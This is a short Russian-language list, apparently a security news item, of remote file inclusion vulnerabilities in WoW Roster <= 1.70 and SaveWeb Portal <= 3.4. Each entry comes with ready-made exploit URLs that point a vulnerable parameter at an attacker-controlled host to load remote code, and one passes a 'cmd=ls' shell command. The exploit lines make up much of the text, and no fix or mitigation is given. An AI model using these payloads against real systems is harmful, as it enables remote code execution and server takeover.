Последние веб-уязвимости

WoW Roster <= 1.70 — удаленная, позволяет инклудить файл, присуствует в файле /lib/phpbb.php.
Использование:
http://site.com/[path]/lib/phpbb.php?subdir=http://[evilhost]/cmd.txt?&cmd=ls

SaveWeb Portal <= 3.4 — удаленная уязвимость, позволяет инклудить файл, уязвимый код include($SITE_Path.»poll/poll.php»).
Использование:
http://site.com/[path]/menu_dx.php?SITE_Path=http://evil_scripts?
http://site.com/[path]/poll/poll.php?SITE_Path=http://evil_scripts?
http://site.com/[path]/poll/view_polls.php?SITE_Path=http://evil_scripts?